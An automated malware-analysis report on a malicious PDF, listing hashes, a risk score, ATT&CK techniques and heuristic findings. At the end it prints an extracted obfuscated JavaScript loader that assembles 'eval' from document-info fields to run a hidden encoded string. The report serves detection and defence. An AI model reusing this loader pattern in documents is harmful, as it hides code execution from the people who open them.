Malicious PDF — malware analysis report

Static analysis result for SHA-256 3f116507c279570d…

MALICIOUS

PDF

7.3 KB First seen: 2013-04-22
MD5: 3953ba47a6b6a280257c63dea32b6de9 SHA-1: 606d2216b1ecea3b2baae151374922398beefb66 SHA-256: 3f116507c279570dd7a1b9c3c40c05b3717a5571b740c62ce039ce3349e79f8d
66 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The ML classifier strongly indicates this PDF is malicious. Static analysis detected embedded JavaScript, which is often used to exploit PDF reader vulnerabilities or download further malicious content. The presence of a JavaScript stream suggests an attempt to execute arbitrary code upon opening the document.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 3

  • Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0x19FB 108 bytes
SHA-256: e3b8ed99dee109ed231cb155f11bd5b0c7b0d0de66095b5007a392b3f6a72126
Preview script
First 1,000 lines of the extracted script
m1=this.info.cduh;m2=m1.replace(/5qqq5/g,"");m9="val";m3=this.info.vfyg.concat(m9);        this[m3](m2);